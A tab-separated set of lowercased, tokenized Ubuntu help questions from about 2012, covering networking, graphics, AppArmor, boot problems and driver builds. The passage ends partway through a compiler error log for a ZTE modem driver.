230580	emulating ie in ubuntu	i need to test my web site in internet explorer . unluckily , i ca n't move it to windows and run there . so what is the easiest way to test it ?
230588	making eth0 to starts when system is up	i need to configure eth0 to start when system is on . the configuration for eth0 must be permanent and dynamic
230589	404 error on existing file for bots	my website works fine for users , but apache2 gives 404 error for some pages to bot requests ( google and yandex ) . how can i solve this problem ? one row from apache access.log : 66.249.76.215 - - [ 19/dec/2012:13:18:38 +0200 ] `` get /index.php http/1.1 '' 404 572 `` - '' `` mozilla/5.0 ( compatible ; googlebot/2.1 ; +http : //www.google.com/bot.html ) ''
230590	prox* authentication issue with online accounts ( 12.10 )	i want to use ubuntu 's online accounts feature to access my facebook account . the thing is , my school has a proxy server you have to use to access https sites . so i configured my proxy settings accordingly . i am pretty sure the proxy setting is right because i logged into facebook with chrome . but when i try to log in with ubuntu `` online accounts '' feature , it gives me this error . i am not totally sure it is a proxy problem either . i copy pasted the url into chrome and it works . ps : the title is weird because my isp blocks any url with the word proxy in it , and the title is incorporated into the url . please help ! !
230592	how to adjust contrast with xcalib	i 'm trying to adjust contrast on my laptop , a thinkpad e430 , running ubuntu 12.04 : xcalib -co 70 -a xrandr -- output lvds1 -- brightness 0.7 either of them works only for 1-2 seconds and after that contrast drops to its normal setting by ubuntu . what should i do to prevent this action ?
230595	how to install a package from within my application ?	i am a developer and for my application i require some packages to be installed . so when for example the user tries to activate a feature of the programm ( that requires a package ) , i want to popup a messagebox asking that he needs that package in order to activate the feature.. yes install `` package name '' / cancel so when he hits yes popup this dialog and install the packages : is there a way to do that ? a certain command or something ?
230597	make directory named 0001 instead of 1 in a bash script loop	in the following bash script if j=0000 how have i to change the following bash script to make dirs named 0001 , 0002 , ... ? actually it make dirs named 1 , 2 , 3 for i in *.jpg ; do let j+=1 ; mkdir $ j ; done thanks !
230601	eclipse not showing pydev in preferences	after installing eclipse and python i am not able to see pydev on eclipse . when i try to install eclipse again it is showing as duplicate location .
230602	how to uncompress separated tgz files ?	i am receiving error message as : tar -zxvf ovm_el5u3_x86_ebiz12.1.1_db_vis_pvm.tgz.1 gzip : stdin : not in gzip format tar : child returned status 1 tar : error is not recoverable : exiting now file name is ending with . tgz . 1 . when file name is . tgz . 0 it will unzip by tar -zxvf command .
230603	full screen chromium but no remote desktop	i 've followed this guide to set up a kiosk pc : http : //www.instructables.com/id/setting-up-ubuntu-as-a-kiosk-web-appliance/ small difference is that i did it all with the admin account and i did n't use the xscreensaver because the pc is used as a monitoring device ( loads an internal webpage which shows all webserver states etc ) . the only problem i have now is that while i 'm in the kiosk mode session i ca n't access the pc with remote vnc . i tried adding a command to manually start vinoserver in the kiosk shell but to no avail . as i 'm fairly new to this i hope you can help me . you probably need more information , but i 'm unsure what you need , so please just tell me whatever info i can provide and i 'll add it asap . edit : as an additional question , i 'm unable to prevent the system from going to standby even though the normal gnome session is set to always on . any help on that account would also be welcome thanks !
230605	how can i only show week day and date in my gnome shell clock ?	i had to reinstall ubuntu 12.04 on my desktop pc after something went awry while trying to update to 12.10 . before reinstalling , my clock had the following format : wed 13:21 : and now , this is what i see : 13:21 2012-12-19 , wednesdsay : i ca n't for the life of me remember how to fix it , plus i do n't think i did anything different from my previous install . if i disable the show-date function either from terminal or gnome tweak tool , all i see is the time . what i 'd like it to show would simply be day and time , like in the first pic . can anyone help ?
230606	how to configure an openvpn client router	i am attempting to set up an openvpn router so that i may connect my tablet ( wireless ) and blu-ray ( wired ) to a paid vpn service in another country on ubuntu 12.10 . i have successfully done this using dd-wrt ( too slow ) and a virtual instance of pfsense ( too limited ) . i 'm new to linux , but i 'm 90 % complete with this project . hardware is 2 wired ethernet ports , one of which is connected to a traditional home router , and a wireless card . so far i have.. set up my wireless to act as a true master access point using hostapd created a bridge ( i think ) between the wireless and local lan set up a dhcp server that is successfully assigning addresses to the bridge - both wireless and wired are getting them . set up openvpn so that it successfully creates a tunneled connection upon boot . current behavior routes all traffic from my ubuntu machine to the vpn server . the other devices do not have any connectivity , and that 's the issue . my question/goal : how do i configure the routing so that openvpn only directs traffic from my bridge ( devices under 192.168.10.x ) through the vpn tunnel and not traffic from the actual ubuntu computer ? openvpn sets up some routes automatically , but it seems to ignore the bridge i set up . i have read a lot of documentation on iptables and route but it makes very little sense to me . despite multiple tutorials , i still do n't understand how to read the results from the route command . i also suspect this can be accomplished with route-noexec and route-up in the openvpn configuration file , but nothing has been successful . my knowledge of where configuration files and settings are is limited . the above tasks took me at least 30 hours of tinkering , so please go easy on me : ) thanks ! edit i 've posted a solution below that directs the bridge traffic , but it does n't prevent traffic on the ubuntu computer from going through the vpn .
230609	brightness keyboard buttons do not work on asus 1225c	i have problem with my new netbook . i installed ubuntu 12.10 and i ca n't use my brightness key 's ( fn+f5/f6 ) . when i use them osd appears and indicates the increase or decrease of brightness but nothing really happens to screen . i used this command from terminal ( and it worked ) : sudo setpci -s 00:02.0 f4.b=xx but i want use my fn keys . is it possible to do this ? thanks for help !
230616	personalized wallpaper picture should not show in lock screen	i have been trying to find an answer to this , but it does n't seem to be possible to find someone who has had a similar issue , although i find that hard to believe . nonetheless , here 's the issue . when i work on my computer , i like having a picture of my better half on the screen , so that every now and then , when i take a short break , i can look at her , smile , and go back to work . but when i lock the screen , that picture remains the background picture , and quite frankly , i would n't appreciate other people looking at her when i 'm not on the pc . any pointers into the right direction would be greatly appreciated ! it 's 12.10 btw .
230618	ordinary letter works only when pressed for some time ( letter `` n '' )	i am stuck with a problem . when i press the letter `` n '' then nothing happens but if i hold it on for 1 - 1,5 sec then it works . the letter is working perfectly on the first page log-in but afterwards the button is like partly disabled i have dual-boot so i tried it on windows and the button worked . it seems like there is a task that it wants to complete , when the button is pressed . i 'm not an expert so my theory might be wrong . if anyone can help , then it would be really appreciated . thanks in advance : ) mike
230619	can not install sqlite3	os : ubuntu 12.04 lts $ sudo apt-get install libsqlite3-dev the following packages have unmet dependencies : libsqlite3-dev : depends : libsqlite3-0 ( =3.7.9-2ubuntu1 ) but 3.7.9-2ubuntu1.1 is to be installed $ sudo apt-get install libsqlite3-0 building dependency tree reading state information ... done libsqlite3-0 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 103 not upgraded . i have also try to download the newest package on https : //launchpad.net/ubuntu/raring/i386/libsqlite3-dev/3.7.15-1 and have read this : https : //getsatisfaction.com/jolicloud/topics/installing_libsqlite3_dev_doesnt_work ubuntu responsed : `` can not install libc6 : i386 '' or `` is not statisfiable ... ''
230621	is apparmor actually working well enough ?	i am wondering how unsafe ubuntu linux actually is . having different file permissions for root / and other users might today not be enough and actually when asking many people might point out that all the often unsufficiently safe file permissions in ubuntu are supplemented by apparmor . apparmor is a mac ( no addres , it means mandatory access controll ) and in short its puropose is to limit the mischief a program can do . without apparmor a program can do quite a bit of mischief -at least in the context of the user account . and being honest having the whole user-account as a playground a further privelige escalation is possible . hence here apparmor should help . a program receives a profile that can will make that even though ( from its file permissions ) the program could ( say delete your files ) it is not allowed to do so . one might think `` happy chocolate cake eating '' , everything is safe , after all ubunut ships with this magic security thing apparmor `` out of the box '' my question is : is this the truth ? is ubuntu , having apparmor , anything safer ? my reasons for that are : - 1 ) in essence apparmor is to my believe up to noway configured . and worse even when there is no profile in place this means that the situation is as bad as if there would never ever have been a apparmor . then it is useless ( source : http : //wiki.apparmor.net/index.php/faq # is_apparmor_policy_default_deny_.28white_listing.29 ) 2 ) firefox is the default browser and due to its being using `` arbitrary content from the web '' it is the number one unsafe thing . if you want so , it is one of the best targets . any wrong addon ( installed in 2min ) can basically delete , worse shred all your files . and apparmor does what about it ? nothing it just ignores firefox . i can only imagine why one would wish to have no protection when indeed it is the most necessary . 3 ) lastly : the so-famous apparmor-profiles package ( which after all at least tries to bring the missing thing for safety : namely the profiles who limit applications ) has been looked at here and it 's said that those profiles are unfortunatelly not so safe . 4 ) what does apparmor do for the trouble that x-server can be so easily keylogged ? little to nothing . once typed sudo and entered your credentials ? well `` congrats '' with your addon-hacker browser there are good chances that a keylogger has yielded some good result . arguably this flaw to security is not a trouble of ubnutu and apparmor only , though it is said that a lsm and apparmor does nothing about it . in a nutshell i think the only reason why ubuntu ( with apparmor ) is not striken by malware like hell , is because it is not the most werthwhile target . but in no way ubuntu is safe and not a bit safer even with apparmor . but i might be overlooking something and i am eager to learn the truth ! therefore please tell me the answer to the question possed so is ubuntu absolutely vulnerable and in that context , what is apparmor werth ?
230624	ubuntu 12.10 dual monitor setup - ati radeon 4000series . virtual size of 800x600 is actually trying for 2	i have ubuntu 12.10 , ati drivers installed and working ( not an easy task ) . i am trying to dual monitor out . i have a 26 '' lcd tv for monitor one running 1920x1080 . i have mirror off , and have tried lower settings . bottom line i do n't want the 26 '' any lower . problem i see is when i click 800x600 for my 21 '' sony crt the error message says `` required virtual size does not fit available size : requested= ( 2720 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) '' . why is it trying to make 2720x1080 under 800x600 settings ( of course its going bug out that 's above standard output ) . soooo my question , as i am fairly new to ubuntu ( but have learned a lot from ati drivers setup ) is how can i command ( in the terminal ) to change resolution on just monitor # 2 ( sony 21 '' ) to be accurate , say , 1024x768 ( a known working res on other os 's ) or even a basic 800x600 . whats the command , if any , or any other ideas . thanks to anyone who bothers with this . : )
230629	free pdf reader that supports taking notes ( and bookmarks )	i learned about the pdf possibility of taking notes which are then stored with the document , usefull when reading ebooks . if the note taker also supports some math notation , that would be wonderful ! which free pdf reader can do this ? ( i am using lubuntu 12.10 )
230632	error while installing gnu octave packages	i want to install the gnu octave optim package , but i keep receiving errors in the process . apparently i need to install some other packages first , one of which is the general package . however , when i try to , i receive this error : octave:17 > pkg install general-1.3.2.tar.gz make : /usr/bin/mkoctfile : command not found make : *** [ __exit__.oct ] error 127 'make ' returned the following error : make : entering directory `/tmp/oct-cgipo9/general/src' /usr/bin/mkoctfile __exit__.cc make : leaving directory `/tmp/oct-cgipo9/general/src' error : called from `pkg > configure_make ' in file /usr/share/octave/3.6.1/m/pkg/pkg.m near line 1391 , column 9 error : called from : error : /usr/share/octave/3.6.1/m/pkg/pkg.m at line 834 , column 5 error : /usr/share/octave/3.6.1/m/pkg/pkg.m at line 383 , column 9
230635	how does apparmor deal with non-profiled programs ?	i setup and configured apparmor in ubuntu and i would like to know how apparmor deals with packages and applications which have no apparmor profile ? after installing the package with sudo apt-get install apparmor-profiles , i have 175 profiles reported as loaded from aa-status i can not imagine i have only 175 programs installed on my box , and i would like to know what apparmor does to prevent security breaches in programs that have no profile .
230640	ubuntu 12.10 boots to purple or black screen but intermittently boots fine	i have a fresh install of ubuntu 12.10 64bit dual booting with win7 64bit . windows boots fine every time . when i choose ubuntu from grub2 menu it will sometimes boot just fine . most of the times though it gets stuck at a purple screen with nothing happening and no keys or key combinations working . other times instead of the purple screen i get a black screen with a flashing cursor at the top . nothing happens . i need to hold down the power button to restart and after a couple times of trying it will eventually boot into ubuntu . once that happens everything runs without any problems . i have tried different approaches to fix the problem but to no avail . i tried removing `` quiet splash '' , used no splash , and nomodeset what i got from this was seeing all the text of the boot process but more often than not the process gets stuck right after recognizing all the usb ports and devices . if it gets stuck nothing happens ( except when i plug in a usb device : it still recognizes it with a new line of text ) in the case when the boot process works , after it lists the usb devices it tells me something like : recovery of read-only filesystem necessary . ( its the filesystem that ubuntu runs on ) then it does the recovery and i get : recovery complete . after that ubuntu will boot properly and i get to see the login screen . i have no idea what to do to fix that problem . i have to reboot 3 to 5 times everytime i want to get into ubuntu and i feel like i 'm breaking my new laptop . ( its a lenovo ideapad z580 btw . i5 processor and nvidia gtx640 graphics card ) i hope someone can help me . thanks . edit : i just got a `` failed to enable aa error '' message when waking it up from suspend . i do n't know if that helps or has anything to do with the boot probs . edit 2 : when i remove `` quiet splash '' during boot up i can also see the shut down process in text form . i just realized i 'm getting a `` mount : / is busy '' line before shutting down . does this have anything to do with the recovery process that it runs through when booting up does n't get stuck ? ? ? what can i do ? edit 3 : problem gets annoying . did a fresh install of ubuntu 12.10 64 bits once again ! problem persists . really nobody can help ? ? ? ?
230645	creating a spin from my installation	over the last 6 months or so i have tweaked & customized my ubuntu installation until i have what i feel is a perfect distro ! now i would like to turn it into a custom ubuntu spin that can be run either as i live dvd/usb or installed to a users hdd . is there an `` easy '' way to do this ? i would want to use the standard ubuntu installer but the distro would have it 's own name , so i may need to customize the installer to reflect this .
230646	live usb does not work	i 've made live usb using these `` universal-usb-installer-1.9.1.9 '' , `` unetbootin-windows-581 '' , `` yumi-0.0.8.0 '' & `` linuxlive usb creator 2.8.18 '' in `` fat32 '' format , but unfortunately i could not boot using the pen-drive . my bios supports boot from usb drive . when i am booting from the live usb , it just show black screen with a blinking `` _ '' , but nothing happens after that ( i have waited more than 10 minutes , but nothing happens ) . so , can anyone please help me on this ? [ additional info . : i 've made bootable usb using poweriso and that booted , but it was not possible to access the usb normally afterwards , because poweriso formatted the usb drive as raw ( or anything i do n't know ) and it became 8gb to 700mb , afterwards i had to format it using minitool partition manager . ]
230647	android 3d acceleration in androvm with primusrun ?	i have been trying an android virtual machine called androvm on an ubuntu 12.04 32 bit laptop with intel/nvidia hybrid graphics configuration as the guest os ( details on the graphic cards below ) . i tested some of the graphics-intense applications , like angry birds , and antutu , a benchmarking application , running virtualbox and androvmplayer with primusrun , but they seem really slow , no difference whatsoever as when run without primusrun . i have also tried optirun , which simply crashes with a segfault . how can i enable opengl acceleration for this vm in my hybrid graphics system ? the androvm version i am running is this one : androvm_vbox86tp_4.1.1_r6.1-20130222-gapps-houdini-flash.ova and i am following the installation instructions as explained here : androvm 20130222 release | androvm blog under virtualbox , i have the switched graphics options set to 128mb video memory and enabled 3d acceleration and 2d acceleration . my host bios has its virtualisation options activated . here are my hardware details : sudo primusrun lshw -class display *-display description : vga compatible controller product : gt218 [ geforce 310m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport : d000 ( size=128 ) memory : d3000000-d307ffff *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:52 memory : d3400000-d37fffff memory : b0000000-bfffffff ioport : e080 ( size=8 ) when using optirun ./androvmplayer , i get this : [ vgl ] warning : the opengl rendering context obtained on x display [ vgl ] :8 is indirect , which may cause performance to suffer . [ vgl ] if :8 is a local x display , then the framebuffer device [ vgl ] permissions may be set incorrectly . got command 1002 got command 1002 got command 1 got command 1002 segmentation fault ( core dumped ) and here are the details of my virtualbox installation : dpkg -l virtualbox* | grep ii ii virtualbox 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - base binaries ii virtualbox-dkms 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - kernel module sources for dkms ii virtualbox-guest-additions 4.1.12-1 transitional package for virtualbox-guest-additions-iso ii virtualbox-guest-additions-iso 4.1.12-1 guest additions iso image for virtualbox ii virtualbox-guest-dkms 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - guest addition module source for dkms ii virtualbox-guest-utils 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - non-x11 guest utilities ii virtualbox-guest-x11 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - x11 guest utilities ii virtualbox-qt 4.1.12-dfsg-2ubuntu0.2 x86 virtualization solution - qt based user interface if i run it with optirun , i get the following error : > [ vgl ] warning : the opengl rendering context obtained on x display > [ vgl ] :8 is indirect , which may cause performance to suffer . [ vgl ] > if :8 is a local x display , then the framebuffer device [ vgl ] > permissions may be set incorrectly . > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glcompileshader:351 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderiv:1215 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderinfolog:1238 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glcompileshader:351 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderiv:1215 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderinfolog:1238 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glcompileshader:351 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderiv:1215 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderinfolog:1238 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glcompileshader:351 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderiv:1215 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderinfolog:1238 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glcompileshader:351 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderiv:1215 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetshaderinfolog:1238 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : glgetuniformlocation:1382 > error 0x501 > sdk/emulator/opengl/host/libs/translator/gles_v2/glesv2imp.cpp : gluseprogram:1913 > error 0x501 androvmplayer : ../../src/xcb_conn.c:180 : write_vec : > assertion ` ! c- > out.queue_len ' failed . aborted ( core dumped )
230650	how to move / view pictures on window pc	i have this hd sitting around for a couple of years now that has some pictures of the family i want off . i can see the addition drive . i am just not sure what to commands or tools to use from here . pretty much a ubuntu noob that needs help . device boot start end blocks id system /dev/sdb1 * 63 1441198079 720599008+ 7 hpfs/ntfs/exfat /dev/sdb2 1441198080 1465145343 11973632 7 hpfs/ntfs/exfat
230652	widi ( wireless display ) set up on ubuntu 12.10	i recently purchased a sony vaio s series ultrabook that comes with wireless display . the steps to set this up on windows 8 seem to be well documented but i have n't come across how to set this up on ubuntu . has anyone been able to get this to work ?
230660	disabling network-manager-gnome wireless scanning when connected	how do i prevent the default ubuntu network manager ( network-manager ) from scanning when connected on my wi-fi network ?
230663	error in installing zte ac2738 on ubuntu 3.0.0-12-generic	i am getting this error , struct usb_serial_driver has no member named shutdown . i am installing on 64bit ubuntu 3.0.0-12-generic ... beginning verify cd ... ... verify cd succeed ! ... beginning copy install package files ... ... will take a long time , waiting 5 seconds , please ... copy install package files succeed ! ... 'ztemtapp ' previous version not found . and install now beginning install ... ... current linux release version is 'ubuntu ' ... checking 'app ' process ... checking old installation ... installing ... current path is : . : /tmp/ztemt_datacard/linux 1 . checking previous version ... 2 . copying data bin ... ... will take a few seconds , please waiting ... /tmp/ztemt_datacard/linux 3 . auto load usb driver module ... rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service acpid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop acpid ; start acpid . the restart ( 8 ) utility is also available . acpid stop/waiting acpid start/running , process 11802 4 . changing pppd options ... 5 . changing file permission ... 6 . deleting qt lib when local qt vertion > v4.4.0 ... ... package 'libqtgui4 ' exist ... qt_version = 4 7 . deleting process id file : evdoapp.pid ... 8 . making usb serial driver module : ztemt.ko ... ... will take a few seconds , please waiting ... make -c /lib/modules/3.0.0-12-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.0.0-12-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘destroy_serial’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:159:14 : error : ‘struct usb_serial_driver’ has no member named ‘shutdown’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:165:18 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_open’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:241:36 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:246:8 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:251:6 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:253:10 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:265:3 : warning : passing argument 1 of ‘serial- > type- > open’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:265:3 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:265:3 : warning : passing argument 2 of ‘serial- > type- > open’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:265:3 : note : expected ‘struct usb_serial_port *’ but argument is of type ‘struct file *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:270:20 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:276:6 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:278:6 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:279:20 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_close’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:355:18 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:357:10 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:358:21 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:371:8 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:372:10 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:375:3 : error : too many arguments to function ‘port- > serial- > type- > close’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:377:11 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:378:12 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:379:9 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:380:8 : error : ‘struct usb_serial_port’ has no member named ‘tty’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:386:20 : error : ‘struct usb_serial_port’ has no member named ‘mutex’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_write’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:407:11 : error : ‘struct usb_serial_port’ has no member named ‘open_count’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : warning : passing argument 1 of ‘port- > serial- > type- > write’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : note : expected ‘struct tty_struct *’ but argument is of type ‘struct usb_serial_port *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : warning : passing argument 2 of ‘port- > serial- > type- > write’ from incompatible pointer type [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : note : expected ‘struct usb_serial_port *’ but argument is of type ‘const unsigned char *’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : warning : passing argument 3 of ‘port- > serial- > type- > write’ makes pointer from integer without a cast [ enabled by default ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : note : expected ‘const unsigned char *’ but argument is of type ‘int’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:413:2 : error : too few arguments to function ‘port- > serial- > type- > write’ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c : in function ‘serial_write_room’ : /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:429:11 : error : 